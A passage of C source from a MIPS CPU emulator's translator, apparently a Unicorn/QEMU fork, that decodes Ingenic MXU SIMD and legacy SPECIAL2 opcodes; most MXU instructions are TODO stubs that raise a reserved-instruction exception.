MIPS_INVAL("OPC_MXU_S32LDDV"); generate_exception_end(ctx, EXCP_RI); break; case OPC_MXU_S32LDDVR: /* TODO: Implement emulation of S32LDDVR instruction. */ MIPS_INVAL("OPC_MXU_S32LDDVR"); generate_exception_end(ctx, EXCP_RI); break; default: MIPS_INVAL("decode_opc_mxu"); generate_exception_end(ctx, EXCP_RI); break; } } /* * * Decode MXU pool07 * * 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 * +-----------+---------+---------+---+-------+-------+-----------+ * | SPECIAL2 | rb | rc |st2|x x x x| XRa |MXU__POOL07| * +-----------+---------+---------+---+-------+-------+-----------+ * */ static void decode_opc_mxu__pool07(CPUMIPSState *env, DisasContext *ctx) { uint32_t opcode = extract32(ctx->opcode, 10, 4); switch (opcode) { case OPC_MXU_S32STDV: /* TODO: Implement emulation of S32TDV instruction. */ MIPS_INVAL("OPC_MXU_S32TDV"); generate_exception_end(ctx, EXCP_RI); break; case OPC_MXU_S32STDVR: /* TODO: Implement emulation of S32TDVR instruction. 
*/ MIPS_INVAL("OPC_MXU_S32TDVR"); generate_exception_end(ctx, EXCP_RI); break; default: MIPS_INVAL("decode_opc_mxu"); generate_exception_end(ctx, EXCP_RI); break; } } /* * * Decode MXU pool08 * * 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 * +-----------+---------+-+-------------------+-------+-----------+ * | SPECIAL2 | rb |x| s12 | XRa |MXU__POOL08| * +-----------+---------+-+-------------------+-------+-----------+ * */ static void decode_opc_mxu__pool08(CPUMIPSState *env, DisasContext *ctx) { uint32_t opcode = extract32(ctx->opcode, 20, 1); switch (opcode) { case OPC_MXU_S32LDI: /* TODO: Implement emulation of S32LDI instruction. */ MIPS_INVAL("OPC_MXU_S32LDI"); generate_exception_end(ctx, EXCP_RI); break; case OPC_MXU_S32LDIR: /* TODO: Implement emulation of S32LDIR instruction. */ MIPS_INVAL("OPC_MXU_S32LDIR"); generate_exception_end(ctx, EXCP_RI); break; default: MIPS_INVAL("decode_opc_mxu"); generate_exception_end(ctx, EXCP_RI); break; } } /* * * Decode MXU pool09 * * 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 * +-----------+---------+-+-------------------+-------+-----------+ * | SPECIAL2 | rb |x| s12 | XRa |MXU__POOL09| * +-----------+---------+-+-------------------+-------+-----------+ * */ static void decode_opc_mxu__pool09(CPUMIPSState *env, DisasContext *ctx) { uint32_t opcode = extract32(ctx->opcode, 5, 0); switch (opcode) { case OPC_MXU_S32SDI: /* TODO: Implement emulation of S32SDI instruction. */ MIPS_INVAL("OPC_MXU_S32SDI"); generate_exception_end(ctx, EXCP_RI); break; case OPC_MXU_S32SDIR: /* TODO: Implement emulation of S32SDIR instruction. */ MIPS_INVAL("OPC_MXU_S32SDIR"); generate_exception_end(ctx, EXCP_RI); break; default: MIPS_INVAL("decode_opc_mxu"); generate_exception_end(ctx, EXCP_RI); break; } } /* * * Decode MXU pool10 * * 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 * +-----------+---------+---------+---+-------+-------+-----------+ * | SPECIAL2 | rb | rc |st2|x x x x| XRa |MXU__POOL10| * +-----------+---------+---------+---+-------+-------+-----------+ * */ static void decode_opc_mxu__pool10(CPUMIPSState *env, DisasContext *ctx) { uint32_t opcode = extract32(ctx->opcode, 5, 0); switch (opcode) { case OPC_MXU_S32LDIV: /* TODO: Implement emulation of S32LDIV instruction. */ MIPS_INVAL("OPC_MXU_S32LDIV"); generate_exception_end(ctx, EXCP_RI); break; case OPC_MXU_S32LDIVR: /* TODO: Implement emulation of S32LDIVR instruction. */ MIPS_INVAL("OPC_MXU_S32LDIVR"); generate_exception_end(ctx, EXCP_RI); break; default: MIPS_INVAL("decode_opc_mxu"); generate_exception_end(ctx, EXCP_RI); break; } } /* * * Decode MXU pool11 * * 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 * +-----------+---------+---------+---+-------+-------+-----------+ * | SPECIAL2 | rb | rc |st2|x x x x| XRa |MXU__POOL11| * +-----------+---------+---------+---+-------+-------+-----------+ * */ static void decode_opc_mxu__pool11(CPUMIPSState *env, DisasContext *ctx) { uint32_t opcode = extract32(ctx->opcode, 10, 4); switch (opcode) { case OPC_MXU_S32SDIV: /* TODO: Implement emulation of S32SDIV instruction. */ MIPS_INVAL("OPC_MXU_S32SDIV"); generate_exception_end(ctx, EXCP_RI); break; case OPC_MXU_S32SDIVR: /* TODO: Implement emulation of S32SDIVR instruction. 
*/ MIPS_INVAL("OPC_MXU_S32SDIVR"); generate_exception_end(ctx, EXCP_RI); break; default: MIPS_INVAL("decode_opc_mxu"); generate_exception_end(ctx, EXCP_RI); break; } } /* * * Decode MXU pool12 * * 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 * +-----------+---+---+-------+-------+-------+-------+-----------+ * | SPECIAL2 |an2|x x| Xd | XRc | XRb | XRa |MXU__POOL12| * +-----------+---+---+-------+-------+-------+-------+-----------+ * */ static void decode_opc_mxu__pool12(CPUMIPSState *env, DisasContext *ctx) { uint32_t opcode = extract32(ctx->opcode, 22, 2); switch (opcode) { case OPC_MXU_D32ACC: /* TODO: Implement emulation of D32ACC instruction. */ MIPS_INVAL("OPC_MXU_D32ACC"); generate_exception_end(ctx, EXCP_RI); break; case OPC_MXU_D32ACCM: /* TODO: Implement emulation of D32ACCM instruction. */ MIPS_INVAL("OPC_MXU_D32ACCM"); generate_exception_end(ctx, EXCP_RI); break; case OPC_MXU_D32ASUM: /* TODO: Implement emulation of D32ASUM instruction. */ MIPS_INVAL("OPC_MXU_D32ASUM"); generate_exception_end(ctx, EXCP_RI); break; default: MIPS_INVAL("decode_opc_mxu"); generate_exception_end(ctx, EXCP_RI); break; } } /* * * Decode MXU pool13 * * 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 * +-----------+---+---+-------+-------+-------+-------+-----------+ * | SPECIAL2 |en2|x x|0 0 0 0| XRc | XRb | XRa |MXU__POOL13| * +-----------+---+---+-------+-------+-------+-------+-----------+ * */ static void decode_opc_mxu__pool13(CPUMIPSState *env, DisasContext *ctx) { uint32_t opcode = extract32(ctx->opcode, 22, 2); switch (opcode) { case OPC_MXU_Q16ACC: /* TODO: Implement emulation of Q16ACC instruction. */ MIPS_INVAL("OPC_MXU_Q16ACC"); generate_exception_end(ctx, EXCP_RI); break; case OPC_MXU_Q16ACCM: /* TODO: Implement emulation of Q16ACCM instruction. */ MIPS_INVAL("OPC_MXU_Q16ACCM"); generate_exception_end(ctx, EXCP_RI); break; case OPC_MXU_Q16ASUM: /* TODO: Implement emulation of Q16ASUM instruction. */ MIPS_INVAL("OPC_MXU_Q16ASUM"); generate_exception_end(ctx, EXCP_RI); break; default: MIPS_INVAL("decode_opc_mxu"); generate_exception_end(ctx, EXCP_RI); break; } } /* * * Decode MXU pool14 * * Q8ADDE, Q8ACCE: * 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 * +-----------+---+---+-------+-------+-------+-------+-----------+ * | SPECIAL2 |0 0|x x| XRd | XRc | XRb | XRa |MXU__POOL14| * +-----------+---+---+-------+-------+-------+-------+-----------+ * * D8SUM, D8SUMC: * 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 * +-----------+---+---+-------+-------+-------+-------+-----------+ * | SPECIAL2 |en2|x x|0 0 0 0| XRc | XRb | XRa |MXU__POOL14| * +-----------+---+---+-------+-------+-------+-------+-----------+ * */ static void decode_opc_mxu__pool14(CPUMIPSState *env, DisasContext *ctx) { uint32_t opcode = extract32(ctx->opcode, 22, 2); switch (opcode) { case OPC_MXU_Q8ADDE: /* TODO: Implement emulation of Q8ADDE instruction. */ MIPS_INVAL("OPC_MXU_Q8ADDE"); generate_exception_end(ctx, EXCP_RI); break; case OPC_MXU_D8SUM: /* TODO: Implement emulation of D8SUM instruction. */ MIPS_INVAL("OPC_MXU_D8SUM"); generate_exception_end(ctx, EXCP_RI); break; case OPC_MXU_D8SUMC: /* TODO: Implement emulation of D8SUMC instruction. 
*/ MIPS_INVAL("OPC_MXU_D8SUMC"); generate_exception_end(ctx, EXCP_RI); break; default: MIPS_INVAL("decode_opc_mxu"); generate_exception_end(ctx, EXCP_RI); break; } } /* * * Decode MXU pool15 * * S32MUL, S32MULU, S32EXTRV: * 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 * +-----------+---------+---------+---+-------+-------+-----------+ * | SPECIAL2 | rs | rt |x x| XRd | XRa |MXU__POOL15| * +-----------+---------+---------+---+-------+-------+-----------+ * * S32EXTR: * 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 * +-----------+---------+---------+---+-------+-------+-----------+ * | SPECIAL2 | rb | sft5 |x x| XRd | XRa |MXU__POOL15| * +-----------+---------+---------+---+-------+-------+-----------+ * */ static void decode_opc_mxu__pool15(CPUMIPSState *env, DisasContext *ctx) { uint32_t opcode = extract32(ctx->opcode, 14, 2); switch (opcode) { case OPC_MXU_S32MUL: /* TODO: Implement emulation of S32MUL instruction. */ MIPS_INVAL("OPC_MXU_S32MUL"); generate_exception_end(ctx, EXCP_RI); break; case OPC_MXU_S32MULU: /* TODO: Implement emulation of S32MULU instruction. */ MIPS_INVAL("OPC_MXU_S32MULU"); generate_exception_end(ctx, EXCP_RI); break; case OPC_MXU_S32EXTR: /* TODO: Implement emulation of S32EXTR instruction. */ MIPS_INVAL("OPC_MXU_S32EXTR"); generate_exception_end(ctx, EXCP_RI); break; case OPC_MXU_S32EXTRV: /* TODO: Implement emulation of S32EXTRV instruction. */ MIPS_INVAL("OPC_MXU_S32EXTRV"); generate_exception_end(ctx, EXCP_RI); break; default: MIPS_INVAL("decode_opc_mxu"); generate_exception_end(ctx, EXCP_RI); break; } } /* * * Decode MXU pool16 * * D32SARW: * 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 * +-----------+---------+-----+-------+-------+-------+-----------+ * | SPECIAL2 | rb |x x x| XRc | XRb | XRa |MXU__POOL16| * +-----------+---------+-----+-------+-------+-------+-----------+ * * S32ALN: * 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 * +-----------+---------+-----+-------+-------+-------+-----------+ * | SPECIAL2 | rs |x x x| XRc | XRb | XRa |MXU__POOL16| * +-----------+---------+-----+-------+-------+-------+-----------+ * * S32ALNI: * 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 * +-----------+-----+---+-----+-------+-------+-------+-----------+ * | SPECIAL2 | s3 |0 0|x x x| XRc | XRb | XRa |MXU__POOL16| * +-----------+-----+---+-----+-------+-------+-------+-----------+ * * S32LUI: * 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 * +-----------+-----+---+-----+-------+---------------+-----------+ * | SPECIAL2 |optn3|0 0|x x x| XRc | s8 |MXU__POOL16| * +-----------+-----+---+-----+-------+---------------+-----------+ * * S32NOR, S32AND, S32OR, S32XOR: * 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 * +-----------+---------+-----+-------+-------+-------+-----------+ * | SPECIAL2 |0 0 0 0 0|x x x| XRc | XRb | XRa |MXU__POOL16| * +-----------+---------+-----+-------+-------+-------+-----------+ * */ static void decode_opc_mxu__pool16(CPUMIPSState *env, DisasContext *ctx) { uint32_t opcode = extract32(ctx->opcode, 18, 3); switch (opcode) { case OPC_MXU_D32SARW: /* TODO: Implement emulation of D32SARW instruction. */ MIPS_INVAL("OPC_MXU_D32SARW"); generate_exception_end(ctx, EXCP_RI); break; case OPC_MXU_S32ALN: /* TODO: Implement emulation of S32ALN instruction. 
*/ MIPS_INVAL("OPC_MXU_S32ALN"); generate_exception_end(ctx, EXCP_RI); break; case OPC_MXU_S32ALNI: gen_mxu_S32ALNI(ctx); break; case OPC_MXU_S32LUI: /* TODO: Implement emulation of S32LUI instruction. */ MIPS_INVAL("OPC_MXU_S32LUI"); generate_exception_end(ctx, EXCP_RI); break; case OPC_MXU_S32NOR: gen_mxu_S32NOR(ctx); break; case OPC_MXU_S32AND: gen_mxu_S32AND(ctx); break; case OPC_MXU_S32OR: gen_mxu_S32OR(ctx); break; case OPC_MXU_S32XOR: gen_mxu_S32XOR(ctx); break; default: MIPS_INVAL("decode_opc_mxu"); generate_exception_end(ctx, EXCP_RI); break; } } /* * * Decode MXU pool17 * * 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 * +-----------+---------+---------+---+---------+-----+-----------+ * | SPECIAL2 | rs | rt |0 0| rd |x x x|MXU__POOL15| * +-----------+---------+---------+---+---------+-----+-----------+ * */ static void decode_opc_mxu__pool17(CPUMIPSState *env, DisasContext *ctx) { uint32_t opcode = extract32(ctx->opcode, 6, 2); switch (opcode) { case OPC_MXU_LXW: /* TODO: Implement emulation of LXW instruction. */ MIPS_INVAL("OPC_MXU_LXW"); generate_exception_end(ctx, EXCP_RI); break; case OPC_MXU_LXH: /* TODO: Implement emulation of LXH instruction. */ MIPS_INVAL("OPC_MXU_LXH"); generate_exception_end(ctx, EXCP_RI); break; case OPC_MXU_LXHU: /* TODO: Implement emulation of LXHU instruction. */ MIPS_INVAL("OPC_MXU_LXHU"); generate_exception_end(ctx, EXCP_RI); break; case OPC_MXU_LXB: /* TODO: Implement emulation of LXB instruction. */ MIPS_INVAL("OPC_MXU_LXB"); generate_exception_end(ctx, EXCP_RI); break; case OPC_MXU_LXBU: /* TODO: Implement emulation of LXBU instruction. */ MIPS_INVAL("OPC_MXU_LXBU"); generate_exception_end(ctx, EXCP_RI); break; default: MIPS_INVAL("decode_opc_mxu"); generate_exception_end(ctx, EXCP_RI); break; } } /* * * Decode MXU pool18 * * 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 * +-----------+---------+-----+-------+-------+-------+-----------+ * | SPECIAL2 | rb |x x x| XRd | XRa |0 0 0 0|MXU__POOL18| * +-----------+---------+-----+-------+-------+-------+-----------+ * */ static void decode_opc_mxu__pool18(CPUMIPSState *env, DisasContext *ctx) { uint32_t opcode = extract32(ctx->opcode, 18, 3); switch (opcode) { case OPC_MXU_D32SLLV: /* TODO: Implement emulation of D32SLLV instruction. */ MIPS_INVAL("OPC_MXU_D32SLLV"); generate_exception_end(ctx, EXCP_RI); break; case OPC_MXU_D32SLRV: /* TODO: Implement emulation of D32SLRV instruction. */ MIPS_INVAL("OPC_MXU_D32SLRV"); generate_exception_end(ctx, EXCP_RI); break; case OPC_MXU_D32SARV: /* TODO: Implement emulation of D32SARV instruction. */ MIPS_INVAL("OPC_MXU_D32SARV"); generate_exception_end(ctx, EXCP_RI); break; case OPC_MXU_Q16SLLV: /* TODO: Implement emulation of Q16SLLV instruction. */ MIPS_INVAL("OPC_MXU_Q16SLLV"); generate_exception_end(ctx, EXCP_RI); break; case OPC_MXU_Q16SLRV: /* TODO: Implement emulation of Q16SLRV instruction. */ MIPS_INVAL("OPC_MXU_Q16SLRV"); generate_exception_end(ctx, EXCP_RI); break; case OPC_MXU_Q16SARV: /* TODO: Implement emulation of Q16SARV instruction. 
*/ MIPS_INVAL("OPC_MXU_Q16SARV"); generate_exception_end(ctx, EXCP_RI); break; default: MIPS_INVAL("decode_opc_mxu"); generate_exception_end(ctx, EXCP_RI); break; } } /* * * Decode MXU pool19 * * 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 * +-----------+---+---+-------+-------+-------+-------+-----------+ * | SPECIAL2 |0 0|x x| XRd | XRc | XRb | XRa |MXU__POOL19| * +-----------+---+---+-------+-------+-------+-------+-----------+ * */ static void decode_opc_mxu__pool19(CPUMIPSState *env, DisasContext *ctx) { uint32_t opcode = extract32(ctx->opcode, 22, 2); switch (opcode) { case OPC_MXU_Q8MUL: case OPC_MXU_Q8MULSU: gen_mxu_q8mul_q8mulsu(ctx); break; default: MIPS_INVAL("decode_opc_mxu"); generate_exception_end(ctx, EXCP_RI); break; } } /* * * Decode MXU pool20 * * 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 * +-----------+---------+-----+-------+-------+-------+-----------+ * | SPECIAL2 |0 0 0 0 0|x x x| XRc | XRb | XRa |MXU__POOL20| * +-----------+---------+-----+-------+-------+-------+-----------+ * */ static void decode_opc_mxu__pool20(CPUMIPSState *env, DisasContext *ctx) { uint32_t opcode = extract32(ctx->opcode, 18, 3); switch (opcode) { case OPC_MXU_Q8MOVZ: /* TODO: Implement emulation of Q8MOVZ instruction. */ MIPS_INVAL("OPC_MXU_Q8MOVZ"); generate_exception_end(ctx, EXCP_RI); break; case OPC_MXU_Q8MOVN: /* TODO: Implement emulation of Q8MOVN instruction. */ MIPS_INVAL("OPC_MXU_Q8MOVN"); generate_exception_end(ctx, EXCP_RI); break; case OPC_MXU_D16MOVZ: /* TODO: Implement emulation of D16MOVZ instruction. */ MIPS_INVAL("OPC_MXU_D16MOVZ"); generate_exception_end(ctx, EXCP_RI); break; case OPC_MXU_D16MOVN: /* TODO: Implement emulation of D16MOVN instruction. */ MIPS_INVAL("OPC_MXU_D16MOVN"); generate_exception_end(ctx, EXCP_RI); break; case OPC_MXU_S32MOVZ: /* TODO: Implement emulation of S32MOVZ instruction. */ MIPS_INVAL("OPC_MXU_S32MOVZ"); generate_exception_end(ctx, EXCP_RI); break; case OPC_MXU_S32MOVN: /* TODO: Implement emulation of S32MOVN instruction. */ MIPS_INVAL("OPC_MXU_S32MOVN"); generate_exception_end(ctx, EXCP_RI); break; default: MIPS_INVAL("decode_opc_mxu"); generate_exception_end(ctx, EXCP_RI); break; } } /* * * Decode MXU pool21 * * 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 * +-----------+---+---+-------+-------+-------+-------+-----------+ * | SPECIAL2 |an2|x x| XRd | XRc | XRb | XRa |MXU__POOL21| * +-----------+---+---+-------+-------+-------+-------+-----------+ * */ static void decode_opc_mxu__pool21(CPUMIPSState *env, DisasContext *ctx) { uint32_t opcode = extract32(ctx->opcode, 22, 2); switch (opcode) { case OPC_MXU_Q8MAC: /* TODO: Implement emulation of Q8MAC instruction. */ MIPS_INVAL("OPC_MXU_Q8MAC"); generate_exception_end(ctx, EXCP_RI); break; case OPC_MXU_Q8MACSU: /* TODO: Implement emulation of Q8MACSU instruction. 
*/ MIPS_INVAL("OPC_MXU_Q8MACSU"); generate_exception_end(ctx, EXCP_RI); break; default: MIPS_INVAL("decode_opc_mxu"); generate_exception_end(ctx, EXCP_RI); break; } } /* * Main MXU decoding function * * 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 * +-----------+---------------------------------------+-----------+ * | SPECIAL2 | |x x x x x x| * +-----------+---------------------------------------+-----------+ * */ static void decode_opc_mxu(CPUMIPSState *env, DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; /* * TODO: Investigate necessity of including handling of * CLZ, CLO, SDBB in this function, as they belong to * SPECIAL2 opcode space for regular pre-R6 MIPS ISAs. */ uint32_t opcode = extract32(ctx->opcode, 0, 6); if (opcode == OPC__MXU_MUL) { uint32_t rs, rt, rd, op1; rs = extract32(ctx->opcode, 21, 5); rt = extract32(ctx->opcode, 16, 5); rd = extract32(ctx->opcode, 11, 5); op1 = MASK_SPECIAL2(ctx->opcode); gen_arith(ctx, op1, rd, rs, rt); return; } if (opcode == OPC_MXU_S32M2I) { gen_mxu_s32m2i(ctx); return; } if (opcode == OPC_MXU_S32I2M) { gen_mxu_s32i2m(ctx); return; } { TCGv t_mxu_cr = tcg_temp_new(tcg_ctx); TCGLabel *l_exit = gen_new_label(tcg_ctx); gen_load_mxu_cr(tcg_ctx, t_mxu_cr); tcg_gen_andi_tl(tcg_ctx, t_mxu_cr, t_mxu_cr, MXU_CR_MXU_EN); tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_NE, t_mxu_cr, MXU_CR_MXU_EN, l_exit); switch (opcode) { case OPC_MXU_S32MADD: /* TODO: Implement emulation of S32MADD instruction. */ MIPS_INVAL("OPC_MXU_S32MADD"); generate_exception_end(ctx, EXCP_RI); break; case OPC_MXU_S32MADDU: /* TODO: Implement emulation of S32MADDU instruction. */ MIPS_INVAL("OPC_MXU_S32MADDU"); generate_exception_end(ctx, EXCP_RI); break; case OPC_MXU__POOL00: decode_opc_mxu__pool00(env, ctx); break; case OPC_MXU_S32MSUB: /* TODO: Implement emulation of S32MSUB instruction. */ MIPS_INVAL("OPC_MXU_S32MSUB"); generate_exception_end(ctx, EXCP_RI); break; case OPC_MXU_S32MSUBU: /* TODO: Implement emulation of S32MSUBU instruction. */ MIPS_INVAL("OPC_MXU_S32MSUBU"); generate_exception_end(ctx, EXCP_RI); break; case OPC_MXU__POOL01: decode_opc_mxu__pool01(env, ctx); break; case OPC_MXU__POOL02: decode_opc_mxu__pool02(env, ctx); break; case OPC_MXU_D16MUL: gen_mxu_d16mul(ctx); break; case OPC_MXU__POOL03: decode_opc_mxu__pool03(env, ctx); break; case OPC_MXU_D16MAC: gen_mxu_d16mac(ctx); break; case OPC_MXU_D16MACF: /* TODO: Implement emulation of D16MACF instruction. */ MIPS_INVAL("OPC_MXU_D16MACF"); generate_exception_end(ctx, EXCP_RI); break; case OPC_MXU_D16MADL: /* TODO: Implement emulation of D16MADL instruction. */ MIPS_INVAL("OPC_MXU_D16MADL"); generate_exception_end(ctx, EXCP_RI); break; case OPC_MXU_S16MAD: /* TODO: Implement emulation of S16MAD instruction. */ MIPS_INVAL("OPC_MXU_S16MAD"); generate_exception_end(ctx, EXCP_RI); break; case OPC_MXU_Q16ADD: /* TODO: Implement emulation of Q16ADD instruction. */ MIPS_INVAL("OPC_MXU_Q16ADD"); generate_exception_end(ctx, EXCP_RI); break; case OPC_MXU_D16MACE: /* TODO: Implement emulation of D16MACE instruction. 
*/ MIPS_INVAL("OPC_MXU_D16MACE"); generate_exception_end(ctx, EXCP_RI); break; case OPC_MXU__POOL04: decode_opc_mxu__pool04(env, ctx); break; case OPC_MXU__POOL05: decode_opc_mxu__pool05(env, ctx); break; case OPC_MXU__POOL06: decode_opc_mxu__pool06(env, ctx); break; case OPC_MXU__POOL07: decode_opc_mxu__pool07(env, ctx); break; case OPC_MXU__POOL08: decode_opc_mxu__pool08(env, ctx); break; case OPC_MXU__POOL09: decode_opc_mxu__pool09(env, ctx); break; case OPC_MXU__POOL10: decode_opc_mxu__pool10(env, ctx); break; case OPC_MXU__POOL11: decode_opc_mxu__pool11(env, ctx); break; case OPC_MXU_D32ADD: /* TODO: Implement emulation of D32ADD instruction. */ MIPS_INVAL("OPC_MXU_D32ADD"); generate_exception_end(ctx, EXCP_RI); break; case OPC_MXU__POOL12: decode_opc_mxu__pool12(env, ctx); break; case OPC_MXU__POOL13: decode_opc_mxu__pool13(env, ctx); break; case OPC_MXU__POOL14: decode_opc_mxu__pool14(env, ctx); break; case OPC_MXU_Q8ACCE: /* TODO: Implement emulation of Q8ACCE instruction. */ MIPS_INVAL("OPC_MXU_Q8ACCE"); generate_exception_end(ctx, EXCP_RI); break; case OPC_MXU_S8LDD: gen_mxu_s8ldd(ctx); break; case OPC_MXU_S8STD: /* TODO: Implement emulation of S8STD instruction. */ MIPS_INVAL("OPC_MXU_S8STD"); generate_exception_end(ctx, EXCP_RI); break; case OPC_MXU_S8LDI: /* TODO: Implement emulation of S8LDI instruction. */ MIPS_INVAL("OPC_MXU_S8LDI"); generate_exception_end(ctx, EXCP_RI); break; case OPC_MXU_S8SDI: /* TODO: Implement emulation of S8SDI instruction. */ MIPS_INVAL("OPC_MXU_S8SDI"); generate_exception_end(ctx, EXCP_RI); break; case OPC_MXU__POOL15: decode_opc_mxu__pool15(env, ctx); break; case OPC_MXU__POOL16: decode_opc_mxu__pool16(env, ctx); break; case OPC_MXU__POOL17: decode_opc_mxu__pool17(env, ctx); break; case OPC_MXU_S16LDD: /* TODO: Implement emulation of S16LDD instruction. */ MIPS_INVAL("OPC_MXU_S16LDD"); generate_exception_end(ctx, EXCP_RI); break; case OPC_MXU_S16STD: /* TODO: Implement emulation of S16STD instruction. */ MIPS_INVAL("OPC_MXU_S16STD"); generate_exception_end(ctx, EXCP_RI); break; case OPC_MXU_S16LDI: /* TODO: Implement emulation of S16LDI instruction. */ MIPS_INVAL("OPC_MXU_S16LDI"); generate_exception_end(ctx, EXCP_RI); break; case OPC_MXU_S16SDI: /* TODO: Implement emulation of S16SDI instruction. */ MIPS_INVAL("OPC_MXU_S16SDI"); generate_exception_end(ctx, EXCP_RI); break; case OPC_MXU_D32SLL: /* TODO: Implement emulation of D32SLL instruction. */ MIPS_INVAL("OPC_MXU_D32SLL"); generate_exception_end(ctx, EXCP_RI); break; case OPC_MXU_D32SLR: /* TODO: Implement emulation of D32SLR instruction. */ MIPS_INVAL("OPC_MXU_D32SLR"); generate_exception_end(ctx, EXCP_RI); break; case OPC_MXU_D32SARL: /* TODO: Implement emulation of D32SARL instruction. */ MIPS_INVAL("OPC_MXU_D32SARL"); generate_exception_end(ctx, EXCP_RI); break; case OPC_MXU_D32SAR: /* TODO: Implement emulation of D32SAR instruction. */ MIPS_INVAL("OPC_MXU_D32SAR"); generate_exception_end(ctx, EXCP_RI); break; case OPC_MXU_Q16SLL: /* TODO: Implement emulation of Q16SLL instruction. */ MIPS_INVAL("OPC_MXU_Q16SLL"); generate_exception_end(ctx, EXCP_RI); break; case OPC_MXU_Q16SLR: /* TODO: Implement emulation of Q16SLR instruction. */ MIPS_INVAL("OPC_MXU_Q16SLR"); generate_exception_end(ctx, EXCP_RI); break; case OPC_MXU__POOL18: decode_opc_mxu__pool18(env, ctx); break; case OPC_MXU_Q16SAR: /* TODO: Implement emulation of Q16SAR instruction. 
*/ MIPS_INVAL("OPC_MXU_Q16SAR"); generate_exception_end(ctx, EXCP_RI); break; case OPC_MXU__POOL19: decode_opc_mxu__pool19(env, ctx); break; case OPC_MXU__POOL20: decode_opc_mxu__pool20(env, ctx); break; case OPC_MXU__POOL21: decode_opc_mxu__pool21(env, ctx); break; case OPC_MXU_Q16SCOP: /* TODO: Implement emulation of Q16SCOP instruction. */ MIPS_INVAL("OPC_MXU_Q16SCOP"); generate_exception_end(ctx, EXCP_RI); break; case OPC_MXU_Q8MADL: /* TODO: Implement emulation of Q8MADL instruction. */ MIPS_INVAL("OPC_MXU_Q8MADL"); generate_exception_end(ctx, EXCP_RI); break; case OPC_MXU_S32SFL: /* TODO: Implement emulation of S32SFL instruction. */ MIPS_INVAL("OPC_MXU_S32SFL"); generate_exception_end(ctx, EXCP_RI); break; case OPC_MXU_Q8SAD: /* TODO: Implement emulation of Q8SAD instruction. */ MIPS_INVAL("OPC_MXU_Q8SAD"); generate_exception_end(ctx, EXCP_RI); break; default: MIPS_INVAL("decode_opc_mxu"); generate_exception_end(ctx, EXCP_RI); } gen_set_label(tcg_ctx, l_exit); tcg_temp_free(tcg_ctx, t_mxu_cr); } } #endif /* !defined(TARGET_MIPS64) */ static void decode_opc_special2_legacy(CPUMIPSState *env, DisasContext *ctx) { int rs, rt, rd; uint32_t op1; check_insn_opc_removed(ctx, ISA_MIPS32R6); rs = (ctx->opcode >> 21) & 0x1f; rt = (ctx->opcode >> 16) & 0x1f; rd = (ctx->opcode >> 11) & 0x1f; op1 = MASK_SPECIAL2(ctx->opcode); switch (op1) { case OPC_MADD: /* Multiply and add/sub */ case OPC_MADDU: case OPC_MSUB: case OPC_MSUBU: check_insn(ctx, ISA_MIPS32); gen_muldiv(ctx, op1, rd & 3, rs, rt); break; case OPC_MUL: gen_arith(ctx, op1, rd, rs, rt); break; case OPC_DIV_G_2F: case OPC_DIVU_G_2F: case OPC_MULT_G_2F: case OPC_MULTU_G_2F: case OPC_MOD_G_2F: case OPC_MODU_G_2F: check_insn(ctx, INSN_LOONGSON2F); gen_loongson_integer(ctx, op1, rd, rs, rt); break; case OPC_CLO: case OPC_CLZ: check_insn(ctx, ISA_MIPS32); gen_cl(ctx, op1, rd, rs); break; case OPC_SDBBP: if (is_uhi(extract32(ctx->opcode, 6, 20))) { // gen_helper_do_semihosting(tcg_ctx, tcg_ctx->cpu_env); } else { /* * XXX: not clear which exception should be raised * when in debug mode... */ check_insn(ctx, ISA_MIPS32); generate_exception_end(ctx, EXCP_DBp); } break; #if defined(TARGET_MIPS64) case OPC_DCLO: case OPC_DCLZ: check_insn(ctx, ISA_MIPS64); check_mips_64(ctx); gen_cl(ctx, op1, rd, rs); break; case OPC_DMULT_G_2F: case OPC_DMULTU_G_2F: case OPC_DDIV_G_2F: 